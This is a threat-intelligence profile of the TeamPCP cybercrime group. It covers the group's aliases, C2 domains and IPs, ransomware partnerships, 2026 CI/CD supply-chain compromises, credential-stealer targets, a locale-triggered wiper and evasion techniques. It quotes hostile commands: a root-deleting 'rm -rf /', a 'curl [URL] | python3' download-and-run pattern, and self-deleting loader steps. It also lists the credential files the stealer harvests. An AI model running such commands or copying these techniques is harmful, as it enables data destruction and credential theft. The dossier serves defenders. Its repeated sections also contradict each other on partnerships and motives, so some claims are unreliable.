Also tracked as: PCPcat, DeadCatx3, ShellForce, CipherForce, Altered Spider, Persy PCP, CipherForce, CanisterWorm, SHADOW-WATER-058, TA-NATALSTATUS,
IronErn, ShadowRay 2.0
Country of origin for TeamPCP remains unknown,
and cybersecurity researchers have not attributed the group to any specific
nation-state with confidence. They have been active since late 2025, and are
known for executing massive, multi-ecosystem software supply chain attacks and
automated cloud-native compromises.
Timeline of Identities
- TA-NATALSTATUS
(2020–2025): The earliest tracked identity, primarily focused on
exploiting exposed Redis servers to deploy cryptocurrency
miners. This activity was an evolution of campaigns noted by Trend
Micro in 2020. - IronErn
(Mid–Late 2025): Also known as ShadowRay 2.0, this
identity was associated with hijacking artificial intelligence (AI)
infrastructure (specifically Ray clusters) to create a self-propagating
botnet. - TeamPCP
(Late 2025–Present): The group's current public branding, under
which they have expanded into supply chain attacks and open-source
software compromise, while retaining the same underlying infrastructure
and tools used in the TA-NATALSTATUS and IronErn eras.
Attribution Challenges & False Flags
The group actively employs false flag operations to
obscure its true location and mislead investigators:
- Russian
Markers: Malware samples contain Russian cultural references
(e.g., "Koschei," "Baba Yaga") and code that
exempts systems with Russian language settings (ru_* locale). - Contradictory
Targets: Despite the Russian markers, the group deploys
destructive wipers against Iranian infrastructure and
includes logic targeting Israeli systems, creating
conflicting geopolitical signals. - Analyst
Consensus: Firms like Antiy Labs and Gurucul assess
these markers as deliberate "noise" designed to fail traditional
attribution mechanisms rather than authentic indicators of origin.
TeamPCP's current infrastructure
(as of August 2026) is a sophisticated, multi-layered hybrid network combining
ephemeral cloud services, typosquatted domains, and decentralized blockchain
technology to ensure resilience against takedowns.
Primary Command and Control (C2)
The group relies heavily on typosquatted
domains that mimic legitimate security and AI vendors to blend
malicious traffic with normal operations. Key active or recently
observed domains include:
- scan.aquasecurtiy[.]org (mimicking
Aqua Security) - checkmarx[.]zone (mimicking
Checkmarx) - models.litellm[.]cloud (mimicking
LiteLLM)
These domains resolve to IP
addresses hosted by bulletproof hosting providers, primarily Ghosty
Networks LLC (Luxembourg) and TECHOFF SRV LIMITED (Netherlands). Specific
IPs identified include 45.148.10.212, 83.142.209.11,
and 46.151.182.203. These servers typically run AdaptixC2 and Havoc frameworks.
Decentralized Fallback Infrastructure
A defining feature of TeamPCP's
modern infrastructure is its use of the Internet Computer Protocol
(ICP) blockchain for resilient C2.
- ICP
Canisters: The group utilizes smart contracts on the ICP
blockchain (e.g., tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io) as
"dead-drop" C2 servers. - Resilience: Because
this infrastructure is decentralized, it cannot be seized or taken down by
traditional domain registrars or hosting providers, serving as a critical
fallback when primary servers are blocked.
Legacy and Staging Infrastructure
The group maintains continuity
with its historical operations (TA-NATALSTATUS/IronErn) through persistent
domains:
- masscan[.]cloud: Still
serves as a core operational hub, with subdomains
like matrix.masscan[.]cloud acting as backup backends. - natalstatus[.]org: While
less active as a primary C2, it remains linked to the group's staging
framework and historical payload paths (e.g., /EP9ts2/).
Operational Tempo
Recent analysis indicates a shift
in infrastructure usage following their March–May 2026 supply chain cascade.
While the group previously used infrastructure for rapid, broad exploitation,
current patterns suggest a pivot toward monetization, using the
harvested credentials from their supply chain compromises to facilitate
ransomware operations (via the Vect RaaS partnership) rather
than expanding the botnet further.
Operational Connection
Security researchers at Oligo Security have
confirmed that these entities represent a continuous operational history
spanning from 2020 to the present. The connection is established through
significant overlaps in:
- Infrastructure: Shared
use of domains
like natalstatus.org and masscan.cloud (including
subdomains like matrix.masscan.cloud). - Tooling: Identical
malware deployment paths (e.g., /EP9ts2/), script filenames
(ndt.sh, nnt.sh, is.sh, rs.sh), and command-and-control
servers. - Tradecraft: Consistent
staging techniques and backend infrastructure usage across different
campaigns.
Operational Indicators
While the physical location is unconfirmed, some operational details offer limited geographic
clues:
- Infrastructure: Early
command-and-control servers were hosted in Singapore, with additional infrastructure
linked to the U.S. and UAE. - Affiliate
Base: Their partner, Vect Ransomware Group, waives
entry fees for affiliates from CIS countries (Russia and
former Soviet states), suggesting a potential operational focus or
membership base in that region, though this does not confirm TeamPCP's own
origin. - Language: Communications are
primarily in English, often with non-native phrasing, and
occasional references to African politics (specifically Kenya) have been
noted in their Telegram channels, though these are considered weak
indicators.
TeamPCP (also tracked as PCPcat, DeadCatx3, ShellForce,
and CipherForce) is a financially and geopolitically
motivated cybercriminal group that emerged in late 2025,
specializing in cloud-native infrastructure and software
supply chain attacks. The group initially conducted
large-scale worm-driven campaigns exploiting exposed Docker APIs, Kubernetes clusters,
and Redis instances to build botnets for ransomware and cryptomining.
In March 2026, TeamPCP
shifted tactics to compromise widely used CI/CD security
tools, including Trivy, Checkmarx KICS, and LiteLLM. By
stealing GitHub Actions tokens and PyPI publishing
credentials, they deployed a "TeamPCP Cloud Stealer" payload
designed to harvest cloud provider credentials (AWS, GCP,
Azure), SSH keys, and Kubernetes tokens. The group utilizes novel
infrastructure such as Internet Computer Protocol (ICP) blockchain
canisters for command-and-control and employs self-propagating worms
like CanisterWorm to infect additional packages across npm and PyPI.
Key operational characteristics include:
- Hybrid
Motivation: Primarily driven by financial gain through
credential theft and access brokering, with secondary geopolitical objectives
including destructive attacks on Iranian infrastructure. - Cascading
Compromise: They leverage stolen credentials from one compromised
tool to gain access to the next, creating a multi-ecosystem supply chain
attack across GitHub, Docker Hub, npm,
and PyPI. - Operational
Security: Uses RSA-4096/AES-256-CBC encryption
for exfiltration, typosquatted domains (e.g., aquasecurtiy[.]org),
and YouTube kill-switches in backdoor payloads. - Partnerships:
Functions as an access generation engine feeding into ransomware
ecosystems, with formal partnerships noted with Vect Ransomware
Group and collaborations with Lapsus$.
TeamPCP operates as a primary initial access
broker, maintaining a complex web of partnerships to
monetize stolen credentials through ransomware deployment and data
extortion. Their specific partners include:
Primary Ransomware & Extortion Partners
Vect
Ransomware Group
In late March 2026, TeamPCP announced a
formal operational partnership with Vect, a Russian-speaking
Ransomware-as-a-Service (RaaS) operation. Under this
agreement, TeamPCP supplies the initial access gained through supply chain
compromises (specifically the Trivy, KICS, and LiteLLM attacks),
while Vect handles the encryption deployment and extortion. Sophos
confirmed by July 2026 that Vect had successfully deployed ransomware using
credentials sourced directly from TeamPCP operations.
Lapsus$
TeamPCP explicitly collaborates with the
notorious extortion group Lapsus$ to monetize stolen data.
Following the March 2026 supply chain campaigns, TeamPCP transferred
approximately 300 GB of compressed credentials to Lapsus$, who
utilized them to target multi-billion-dollar companies and sell access on the
dark web. Mandiant and Wiz researchers confirmed this active
collaboration, noting that Lapsus$ leverages TeamPCP’s deep access to SaaS
environments for high-profile data leaks.
Operational & Ecosystem Allies
xpl0itrs
This group maintains a close technical partnership
with TeamPCP, engaging in joint operations such as the CanisterWorm deployment
and the Bitwarden CLI compromise in April
2026. xpl0itrs functions as a secondary outlet for TeamPCP’s
initial access, sharing tooling and victim lists within a tightly integrated
supply chain-focused cybercrime ecosystem.
BreachForums
While
technically a marketplace, BreachForums serves as a critical force multiplier through
its formal alliance with Vect and TeamPCP. In
April 2026, the partnership facilitated the distribution of affiliate keys to
BreachForums' entire user base (approx. 300,000 members), effectively
industrializing the distribution of TeamPCP-sourced access for mass ransomware
campaigns.
ShinyHunters / UNC6240
TeamPCP brokers access to ShinyHunters (also
tracked as UNC6240), who utilize the stolen credentials for large-scale
repository cloning and data theft. Notable instances include the
cloning of over 300 private Cisco repositories containing AI
products and sensitive customer code.
Internal Monetization Brands
TeamPCP also operates its own parallel monetization tracks
to ensure redundancy:
- CipherForce:
TeamPCP’s proprietary ransomware brand, used for direct operations
separate from the Vect partnership. - ShellForce:
A persona used specifically for leaking and selling exfiltrated
data.
TeamPCP has established
a sophisticated ecosystem of partnerships designed to industrialize the
monetization of stolen credentials, moving beyond simple data theft to
coordinated ransomware deployment and large-scale extortion. These alliances function as a
"reverse kill chain," where access is secured via supply chain
compromises first, and targets are selected from the resulting credential
archive later.
The Vect-BreachForums Industrial Alliance
The most significant partnership
is the formal triadbetween
TeamPCP, Vect Ransomware Group, and BreachForums.
Announced in late March 2026 and operationalized on April 16, 2026,
this alliance created an unprecedented "mass-affiliate" model:
- Role
Division: TeamPCP acts as the exclusive initial access
broker, supplying credentials harvested from compromised CI/CD tools
(Trivy, KICS, LiteLLM). Vect provides the ransomware
infrastructure (C++ based ChaCha20-Poly1305 encryption), while
BreachForums supplies the human capital. - Scale
of Mobilization: Unlike traditional RaaS models that recruit
affiliates selectively, this partnership distributed Vect affiliate keys
to all ~300,000 registered users of BreachForums
simultaneously. This effectively converted a massive forum user
base into an instant ransomware deployment army. - Operational
Impact: By July 2026, Sophos confirmed active ransomware
deployments where Vect operators selected victims directly from TeamPCP’s
stolen credential archives. This model removes the need for affiliates to
possess technical exploitation skills, as the "entry ticket"
(valid cloud tokens) is pre-supplied by TeamPCP.
Extortion and Data Monetization Partners
To maximize the value of
exfiltrated data (estimated at 300 GB of compressed
credentials), TeamPCP collaborates with specialized extortion groups:
Lapsus$
TeamPCP maintains an explicit
collaboration with Lapsus$ to handle high-profile extortion
campaigns. While TeamPCP focuses on the technical infiltration of SaaS
environments, Lapsus$ leverages its reputation for aggressive public shaming
and social engineering to pressure victims. Wiz researchers confirmed that
TeamPCP transfers validated credentials to Lapsus$, who then target
multi-billion-dollar companies for data leaks and ransom demands.
ShinyHunters (UNC6240)
A critical operational link
exists between TeamPCP and ShinyHunters. Following the March 2026 Trivy
compromise, credentials harvested by TeamPCP were utilized by ShinyHunters to
breach Cisco. This collaboration resulted in the cloning of over 300
private GitHub repositories, including source code for AI products and
tools used by US government agencies (FBI, DHS, NASA). This
partnership highlights a "hand-off" model where TeamPCP provides the
foothold, and ShinyHunters executes the deep data exfiltration.
*The relationship
between TeamPCP and ShinyHunters (also
tracked as UNC6240) is hostile and opportunistic, rather than a formal
partnership. While they operate in the same ecosystem, their
interactions are defined by theft, deception, and conflicting public
narratives.
The "Scam" and Hostile Takeover
Contrary to early reports of
collaboration, TeamPCP leadership
has explicitly stated that ShinyHunters is not a partner. In
a May 9, 2026 interview, the TeamPCP leader detailed a specific incident of
betrayal:
- The
Infiltration:
A member
of ShinyHunters infiltrated the private operator chat
of Vect (TeamPCP’s ransomware partner), demonstrating a failure
in TeamPCP’s vetting or access control mechanisms for their own criminal
ecosystem.
- The
Theft:
The ShinyHunters member agreed to
split profits on a bundle of stolen credentials, downloaded the data, and
then refused to pay.
- The
Smear:
To cover the theft and discredit
TeamPCP, ShinyHunters released a "mix of real and fabricated chats"
portraying the interaction as a legitimate partnership or dispute, rather than
a scam.
·
Data Handover:
The thief was able to download a full
bundle of stolen credentials after agreeing to a profit-split, indicating that
TeamPCP lacks technical safeguards (such as staged data releases or escrow
mechanisms) to prevent partners or infiltrators from absconding with the entire
dataset.
·
Reactive Counter-Measures
Once the theft was identified, TeamPCP
employed the following damage control tactics:
·
Public Discrediting:
In a May 9, 2026 interview
with Inside Darknet, the TeamPCP leader explicitly labeled the
interaction a "scam" and "shitty business practice," aiming
to destroy ShinyHunters' reputation within the cybercriminal underground.
·
Narrative Correction:
They released "a mix of real and
fabricated chats" (mirroring ShinyHunters' own tactics) to prove the theft
occurred and to distance themselves from subsequent high-profile breaches (like
the CERT-EU attack) that ShinyHunters executed using the
stolen data.
·
Attribution Shift:
TeamPCP leadership publicly clarified their
non-involvement in government targets ("We don't even target gov"),
attempting to shift the blame for the CERT-EU breach entirely onto ShinyHunters
to avoid law enforcement scrutiny.
Strategic Implications
The incident highlights that TeamPCP’s security model is trust-based within
a hostile environment. They have no technical method to revoke
access to credentials once they are downloaded by an affiliate or partner.
Their primary defense is the threat of reputational ruin and
the potential for retaliatory doxxing or law enforcement tipping, which serves
as the only deterrent against internal theft in the cybercriminal ecosystem.
Divergent Operational Goals
The two groups have
fundamentally different targeting doctrines, which led to friction over
specific breaches:
- Targeting
Conflicts:
TeamPCP
publicly claims to exclude governments and non-profits from their direct
operations. However, ShinyHunters used the stolen
TeamPCP-sourced credentials to breach the European Commission (CERT-EU),
stealing 340 GB of data from 42 EU departments. TeamPCP
leaders subsequently clarified they did not perform this exfiltration and do
not target government entities, attributing the act solely to ShinyHunters.
- Cisco
Breach:
While TeamPCP
provided the initial access vector (via the compromised Trivy scanner), ShinyHunters independently
executed the deep intrusion into Cisco, cloning over 300 private
repositories (including AI and government-related code) and
launching their own extortion campaign with an April 3 deadline.
The "Convergence" Dynamic
Despite the hostility, the groups
are functionally linked in a "convergence of cybercriminal
ecosystems":
- Access
vs. Extortion: T
TeamPCP
acts as the initial access broker, compromising the supply
chain to harvest credentials. ShinyHunters acts as
a predatory downstream actor, monitoring these compromises
to steal the harvested credentials for their own high-profile extortion
campaigns.
- Blast
Radius:
This dynamic means that even without a formal
agreement, TeamPCP’s compromises directly enable ShinyHunters’ operations.
Security researchers note that this creates a complex threat landscape
where defenders must contend with multiple independent groups exploiting the
same initial breach.
Technical and Operational Allies
xpl0itrs This
group serves as TeamPCP’s primary technical co-conspirator. They jointly
developed and deployed CanisterWorm, the first self-propagating npm
worm utilizing Internet Computer Protocol (ICP) canisters for
command-and-control. Their partnership extends to the Bitwarden
CLI compromise in April 2026. xpl0itrs often acts as a
secondary outlet for selling access derived from TeamPCP’s initial breaches,
such as the alleged 569 GB breach of RapidFort claimed in July
2026.
Internal Redundancy:
CipherForce
To ensure operational resilience
and avoid reliance solely on external partners, TeamPCP operates its own
proprietary ransomware brand, CipherForce. While the
Vect partnership handles mass distribution via BreachForums, CipherForce is
used for direct, controlled operations where TeamPCP retains full authority
over encryption and negotiation, allowing them to test new tactics without exposing
their primary affiliates.
TeamPCP compromised a specific
set of high-value CI/CD and developer security tools
between March 19 and April 22, 2026, executing a cascading attack
where credentials stolen from one tool were used to compromise the next.
Primary CI/CD & Security Tool Compromises
Trivy (Aqua Security)
- Compromise
Date: March 19, 2026 (following an initial breach on Feb
28). - Vector: TeamPCP
exploited a pull_request_target vulnerability to steal a GitHub
Actions PAT, then hijacked release tags (v0.69.4) to inject malware
into GitHub Actions, binaries, and Docker
Hub images. - Impact: As
the initial pivot point, this compromise provided the GitHub
Actions tokens and cloud credentials used to
attack subsequent tools.
Checkmarx KICS (Keeping Infrastructure as Code
Secure)
- Compromise
Date: March 23, 2026. - Vector: Using
credentials harvested from the Trivy compromise, the group poisoned KICS
GitHub Actions (all 35 tags), OpenVSX extensions,
and Docker images. - Impact: Allowed
the theft of Infrastructure-as-Code secrets and further expanded access to
enterprise cloud environments.
LiteLLM (BerriAI)
- Compromise
Date: March 24, 2026. - Vector: Compromised PyPI
publishing credentials (stolen from CI/CD pipelines running the
trojanized Trivy action) to publish malicious versions 1.82.7 and 1.82.8. - Impact: Targeted
AI infrastructure, harvesting API keys for over 100 LLM providers (OpenAI,
Anthropic, etc.) alongside cloud credentials.
Telnyx Python SDK
- Compromise
Date: March 27, 2026. - Vector: Similar
to LiteLLM, malicious versions were published to PyPI using
stolen publishing rights. - Impact: Compromised
telecommunications API credentials and messaging workflows integrated into
CI/CD pipelines.
Secondary & Related Compromises
Bitwarden
CLI
- Compromise
Date: April 22, 2026. - Vector: A
malicious version (2026.4.0) was published to npm by
exploiting a compromised GitHub Action in Bitwarden’s CI/CD pipeline
(linked to the broader TeamPCP campaign). - Impact: Targeted
developer workstations and pipelines to harvest SSH keys, crypto
wallet data, and npm tokens, utilizing a self-propagating
worm mechanism.
TanStack
& Others
- The
campaign also affected TanStack (via OIDC abuse in April
2026) and over 45 npm packages (including @EmilGroup and @opengov)
via a self-propagating worm (deploy.js) that autonomously published
malicious patch versions using stolen tokens.
The triad consisting
of TeamPCP, Vect Ransomware Group,
and BreachForums operates as an integrated, industrialized ransomware
ecosystem rather than three separate entities collaborating
ad-hoc. Their relationship is defined by a strict division
of labor that inverts the traditional ransomware kill chain:
Operational Workflow: The "Reverse Kill
Chain"
1. TeamPCP:
The Access Engine (Supply Chain Layer)
TeamPCP functions exclusively as
the initial access broker. Instead of selecting specific
victims first, they compromise high-volume software supply chain components
(e.g., Trivy, LiteLLM, KICS) to harvest a
massive archive of over 500,000 credentials from CI/CD
pipelines. They do not deploy ransomware themselves in this triad;
their sole output is a validated inventory of compromised cloud tokens and API
keys.
2. Vect:
The Monetization Infrastructure (RaaS Layer)
Vect provides
the weaponization and extortion capability. Unlike traditional RaaS models
where affiliates must find their own way into a network, Vect operators
simply search TeamPCP’s pre-existing credential archive to
select victims. Vect supplies the C++ ransomware payload (using
ChaCha20-Poly1305 encryption), the TOR-based leak site, and the
negotiation infrastructure. This allows affiliates to skip the
exploitation phase entirely and move straight to deployment.
3.
BreachForums: The Distribution & Operational
Layer
BreachForums serves as
the force multiplier and operational platform. On April 16, 2026,
the triad operationalized a "mass-affiliate" model where all ~300,000
registered BreachForums users were automatically issued Vect affiliate
keys. The forum provides:
- Escrow
Services: A Monero-based multi-signature escrow system for
handling ransom payments. - Affiliate
Management: Tiered incentive structures (offering up to 88%
profit share) and support for less technical operators. - Instant
Mobilization: Converting a passive forum user base into an
active ransomware deployment army without selective recruitment.
Strategic Significance
This triad represents a shift
from targeted intrusion to industrialized exploitation. By
decoupling access generation (TeamPCP) from victim selection and encryption
(Vect/BreachForums), the group creates a persistent threat where
credentials stolen in March 2026 can be weaponized months
later. The model lowers the technical barrier to entry,
allowing any BreachForums member to launch a sophisticated ransomware attack
against a major enterprise simply by using a pre-stolen token provided by
TeamPCP.
TeamPCP utilizes a
sophisticated payload known as the "TeamPCP Cloud Stealer" (and
variants like SANDCLOCK and CanisterWorm) to
harvest a comprehensive array of credentials from CI/CD runners, developer
workstations, and cloud environments. The group targets secrets that facilitate
lateral movement across the entire software supply chain.
Cloud Provider & Infrastructure Credentials
The primary objective is to
gain control over cloud infrastructure. The stealer specifically
targets:
- Cloud
Access Keys: AWS Access Keys and Secret Keys
(~/.aws/credentials), GCP Service Account JSON keys, and Azure Service
Principals/Environment Variables. - Kubernetes
Secrets: ServiceAccount tokens, kubeconfig files
(~/.kube/config), and cluster admin credentials. - Container
Registry Tokens: Docker Hub, GitHub Container Registry
(GHCR), and Amazon ECR authentication tokens. - Infrastructure-as-Code
(IaC) State: Terraform state files containing embedded
secrets and provider configurations.
CI/CD & Version Control Tokens
To propagate the attack and
maintain persistence within pipelines, TeamPCP extracts:
- GitHub
Personal Access Tokens (PATs): Specifically those
with repo, workflow, and write:packages scopes, often
harvested by dumping the memory of
the Runner.Worker process. - OIDC
Tokens: OpenID Connect tokens extracted from runner memory to
impersonate identities in cloud environments. - Package
Manager Tokens: PyPI API tokens (used to
poison packages like LiteLLM), npm publish tokens (used
for the CanisterWorm propagation), and OpenVSX publisher
tokens. - GitLab
CI/CD Variables: Protected variables and deploy keys stored
in runner environments.
Application & AI API Keys
Leveraging the compromise of AI-focused tools
like LiteLLM and Xinference, the group harvests:
- LLM
Provider Keys: API keys for OpenAI, Anthropic, Azure
AI, Mistral, and Google Vertex AI. - Communication
Webhooks: Slack incoming webhook URLs and Discord bot
tokens. - Database Credentials: Connection
strings for PostgreSQL, MySQL, MongoDB, and Redis found
in .env files and configuration directories.
Local Developer & Cryptocurrency Secrets
On developer workstations and build agents, the malware scans for:
- SSH
Keys: Private keys (id_rsa, id_ed25519) for
server access and Git operations. - Cryptocurrency
Wallets: Seed phrases, private keys, and credential files for
wallets like MetaMask, Exodus, and Electrum. - VPN & TLS Certificates: OpenVPN
configurations, private TLS keys, and certificate authorities.
All
harvested data is typically compressed into an encrypted archive
(e.g., tpcp.tar.gz or love.tar.gz) using AES-256-CBC with RSA-4096 wrapped
keys before exfiltration to typosquatted domains
(e.g., scan.aquasecurtiy[.]org) or fallback GitHub repositories
(e.g., tpcp-docs).
TeamPCP deployed a
specific destructive wiper payload named Kamikaze (also
referred to as the Iran-focused Kubernetes wiper) against Iranian
infrastructure. This payload was integrated into their
broader CanisterWorm malware family and activated
in late March 2026.
Wiper Mechanics and Targeting
The Kamikaze wiper
operates via a "decision tree" that distinguishes between
Iranian and non-Iranian systems based on locale and timezone settings:
- Target
Identification: The malware scans for specific indicators,
primarily the Asia/Tehran timezone or the fa_IR (Farsi)
locale setting. - Kubernetes
Clusters: If an Iranian system
is detected within a Kubernetes environment, the wiper deploys a
privileged DaemonSet named host-provisioner-iran into
the kube-system namespace. This DaemonSet schedules a destructive
container (often named kamikaze) across every node in
the cluster, including the control plane. The
container mounts the host's root filesystem and executes a recursive
deletion command (rm -rf / --no-preserve-root), effectively
bricking the entire cluster and forcing a reboot. - Standalone
Hosts: On non-Kubernetes Iranian systems, the payload executes the same
recursive deletion logic directly on the host machine, rendering the
operating system unusable. - Non-Iranian
Systems: If the target does not match Iranian indicators, the malware
bypasses the wiper routine and instead installs the standard CanisterWorm backdoor
for persistence and credential theft.
Operational Context
The deployment of Kamikaze marked
a significant escalation for TeamPCP, transitioning the group from
purely financially motivated cybercrime to geopolitically motivated
destruction. Researchers assess this move as potentially
opportunistic—a method for the group to gain notoriety and signal
capability—rather than evidence of direct state sponsorship, though the
precision of the targeting suggests a deliberate intent to disrupt Iranian
digital infrastructure amidst broader regional tensions.
TeamPCP consistently targets
trusted software distribution channels rather than end users directly.
Operations focus on compromising packages, CI/CD infrastructure, developer
workflows, and cloud environments where a single successful intrusion can
cascade into thousands of downstream organizations.
Observed operational patterns include:
- Software
supply chain compromise - Malicious
package publishing on npm and PyPI - Compromise
of GitHub Actions workflows - Credential
theft from cloud environments - SSH
key and API token harvesting - Kubernetes
secret extraction - Source
code theft - Cloud
infrastructure compromise - Extortion
following data theft - Ransomware
access brokerage
Malware ecosystem
Security researchers and the FBI have attributed multiple
malware families to TeamPCP campaigns.
- CanisterWorm harvests
cloud credentials, API tokens, SSH keys, and authentication material from
AWS, Azure, and Google Cloud Platform environments. - SANDCLOCK extracts
AWS credentials, Kubernetes ServiceAccount tokens, environment variables,
and cryptocurrency wallet data. - Mini
Shai-Hulud is a self-propagating software supply chain worm
capable of spreading across npm and PyPI ecosystems. - Miasma expands
on Mini Shai-Hulud techniques by poisoning development environments while
harvesting credentials.
Cloud and AI targeting
Much of TeamPCP’s activity has centered around AI companies,
cloud platforms, developer infrastructure, and enterprise software vendors.
Public reporting and alleged victim
claims have included organizations such as OpenAI, Mistral AI, Lightning AI,
Mercor, GitHub, Cisco, and the European Commission. Rather than deploying
ransomware immediately, the group frequently monetizes access by stealing
repositories, cloud credentials, proprietary source code, and development
secrets.
Shift toward extortion
Recent activity indicates TeamPCP
has expanded beyond software supply chain compromise into direct extortion.
According to the FBI, the group has published victim names on a public leak
site, threatened organizations with data disclosure, and collaborated with
other cybercriminal groups to monetize stolen access.
The advisory also warns that
credentials stolen during TeamPCP intrusions should be treated as a long-term
risk because affiliated threat actors may continue exploiting them well after
the initial compromise.
Current threat assessment
TeamPCP remains one of the most
significant supply chain threats currently facing organizations that rely on
modern software development pipelines. By compromising trusted developer tools
rather than individual victims, the group can rapidly affect thousands of
downstream environments through a single malicious update.
**********Added August 16,2026******
TeamPCP (also tracked
as UNC6780 by Google) is a financially motivated cybercrime
group, not a state-sponsored Advanced Persistent Threat
(APT). Researchers classify the organization as a loose-knit
collective of teenagers and young adults driven by economic
gain through ransomware, extortion, and cryptomining rather than geopolitical
objectives.
The group first emerged in late
2025 and is primarily known for executing massive cloud-native and supply
chain attacks across five software
ecosystems: GitHub
Actions, Docker Hub, npm, PyPI, and OpenVSX. Their
notable campaigns include compromising trusted security tools
like Trivy and KICS to harvest credentials, and they have
explicitly stated they have moved away from encryption-based extortion in favor
of faster, less destructive data theft and access brokering.
Operational
Profile and Evolution
TeamPCP (tracked as UNC6780)
operates as a financially motivated cybercriminal collective rather
than a state-sponsored entity. Emerging in late 2025, the group
evolved from cryptomining operations into a sophisticated supply chain
attack specialist. Their primary business model involves
compromising trusted software development tools to harvest credentials, which
are then sold, used for lateral movement, or leveraged in partnership with
ransomware groups like Vect.
The group is characterized by its cloud-native
approach, exploiting misconfigured Docker APIs, Kubernetes
clusters, and CI/CD pipelines. Unlike traditional APTs that focus on
long-term espionage, TeamPCP prioritizes high-velocity, high-volume
data theft, having exfiltrated over 300 GB of data and
harvested approximately 500,000 credential sets across more
than 1,000 SaaS environments by mid-2026.
Major
Attack Campaigns
The
Cascading Supply Chain Offensive (March 2026)
The group's most significant operation
occurred between March 19 and March 27, 2026, executing
a "cascading" attack across five major ecosystems: GitHub
Actions, Docker Hub, npm, PyPI, and OpenVSX.
- Trivy
Compromise: Exploiting
a pull_request_target vulnerability (CVE-2026-33634), the group
injected the SANDCLOCK credential stealer into
the Trivy vulnerability scanner. This compromised
over 75 version tags, affecting an estimated 10,000+ CI/CD pipeline runs. - KICS
and LiteLLM: Using credentials stolen from Trivy, they
subsequently compromised Checkmarx KICS and the AI
gateway LiteLLM. The LiteLLM breach alone impacted over 2,400
organizations, with stolen API keys remaining active months later. - npm
Worm (CanisterWorm): The group deployed a self-propagating
worm across 47+ npm packages, utilizing decentralized ICP
Canister nodes for command-and-control (C2) to resist
takedowns.
The
GitHub Internal Breach (May 2026)
In a landmark escalation, TeamPCP
compromised GitHub's internal infrastructure on May 20, 2026. By
poisoning a Visual Studio Code extension available on the
official marketplace, they gained access to an employee's
workstation. This allowed them to exfiltrate source code from
approximately 3,800 internal private repositories, including
proprietary security tools. The group subsequently attempted to sell
this data on underground forums for at least $50,000.
Tactics,
Techniques, and Procedures (TTPs)
TeamPCP distinguishes itself
through operational integration rather than novel exploit
development. They heavily utilize modified open-source tools and
well-known vulnerabilities to build a modular criminal platform.
- Credential
Harvesting: Their payloads specifically target cloud provider
metadata (AWS IMDS, Azure MSI), CI/CD runner tokens, and AI API
keys. - Decentralized
C2: They were the first observed group to use Internet
Computer Protocol (ICP) Canisters for resilient C2
infrastructure, making it difficult to disrupt their communications. - Monetization
Strategy: While initially focused on cryptomining (XMRig) and
proxy services, the group has shifted toward access brokering and ransomware
facilitation. In late March 2026, they formalized a
partnership with the ransomware affiliate Vect, trading their stolen
access for ransomware deployment capabilities.
Current
Status and Impact
As of August 2026, TeamPCP remains highly active. Recent
reports indicate that credentials stolen during their March and April campaigns
are still being weaponized. The group has demonstrated a willingness to
deploy destructive wipers in specific geographic regions,
layering data destruction over theft to maximize pressure on
victims. Their success has prompted major platforms like npm and
GitHub to implement stricter security measures, including mandatory 2FA for package
publishing and enhanced monitoring of CI/CD workflows.
TeamPCP (UNC6780) did not
develop unique cryptomining software from scratch; instead, they deployed
heavily modified versions of the open-source XMRig miner.
Their innovation lay in the loader mechanisms and evasion
techniques designed to sustain mining operations on compromised cloud
infrastructure.
Custom
Loaders and Deployment
The group utilized custom shell scripts and loaders to
deploy XMRig with specific configurations to evade detection:
- Memory-Resident
Execution: In campaigns identified in mid-2026, TeamPCP
employed loaders that deleted the miner binary from the disk immediately
after execution, forcing the malware to run purely in memory to
bypass file-based antivirus scans. - Process
Masquerading: Their deployment scripts renamed the XMRig
process to mimic legitimate system daemons (e.g., ssh, systemd)
and utilized LD_PRELOAD hooks to hide watchdog processes
that ensured the miner remained active. - Layered
Obfuscation: The group used layered XOR encryption (with
keys such as I3F0 and CLIENT) to obfuscate the miner's
configuration files and command-line arguments, hiding the mining pool
addresses and wallet IDs from static analysis.
Evasion
and Persistence Tactics
To maximize mining revenue and
longevity, TeamPCP integrated several advanced operational security measures
into their cryptomining modules:
- Non-Root
Impersonation: Unlike typical cryptojacking operations that
seek root access, TeamPCP's later campaigns deliberately operated
under low-privileged user accounts. They
abused Linux Pluggable Authentication Modules (PAM) to
switch identities without passwords, creating a "forensic
smokescreen" that scattered activity across unmonitored
accounts. - Resource
Throttling: Their configurations often limited CPU usage
(e.g., to 60%) and paused mining when specific high-priority processes
were detected to avoid triggering performance-based alerts. - Competitor
Elimination: The deployment scripts included logic to
identify and terminate competing cryptominers and delete rival crontab
entries, ensuring TeamPCP maintained exclusive control over the host's
resources.
TeamPCP evades cloud provider
detection by blending malicious activity with legitimate development traffic
and exploiting the inherent trust placed in CI/CD pipelines. Their evasion
strategy relies on living-off-the-land techniques, memory-only
execution, and decentralized infrastructure.
Traffic
Mimicry and Legitimate Protocol Abuse
The group’s primary evasion method
involves disguising data exfiltration as normal network traffic.
- Telemetry
Masquerading: Their custom credential
stealer, SANDCLOCK, exfiltrates data via HTTPS POST requests to
domains that mimic legitimate monitoring services
(e.g., models.litellm.cloud), allowing traffic to bypass egress
filters that whitelist known SaaS domains. - API
Tunneling: Stolen GitHub tokens are used to exfiltrate data
by creating commits or release artifacts directly on the victim’s own
repositories. Since this traffic is destined for api.github.com, it
appears as legitimate developer activity to corporate firewalls and cloud
logging tools. - Steganography: In
some campaigns, the group has hidden encrypted second-stage payloads
within valid audio (.wav) files, enabling them to bypass network filters
that inspect file types but not deep content.
Memory-Only Execution and
Forensic Evasion
To avoid leaving
artifacts on disk, TeamPCP utilizes aggressive memory-resident techniques
within cloud runners and containers.
- Process
Memory Scraping: Instead of searching for secrets in
environment variables (which are often logged or masked), their payloads
iterate through /proc/[pid]/mem to extract plaintext tokens
(like GITHUB_TOKEN and AWS keys) directly from the memory of
running processes. This bypasses log masking features in GitHub Actions
and other CI/CD platforms. - In-Memory
Payloads: The group frequently pipes scripts directly into
interpreters (e.g., curl [URL] | python3) without writing the script
to the disk. Loaders often delete their own binaries immediately after
execution, forcing the malware to run purely in memory. - Self-Deletion: Custom
loaders include commands to delete temporary files and their own scripts
(rm "$0") immediately after deploying the next stage,
significantly reducing the forensic footprint on ephemeral cloud
instances.
Decentralized and Resilient Command & Control (C2)
TeamPCP avoids traditional C2
infrastructure that can be easily sinkholed or blocked.
- Blockchain-Based
C2: They were the first observed group to use Internet
Computer Protocol (ICP) Canisters for command and
control. Because ICP canisters are decentralized, immutable
smart contracts, there is no central server to seize and no DNS record to
sinkhole, forcing defenders to rely on complex behavioral analysis rather
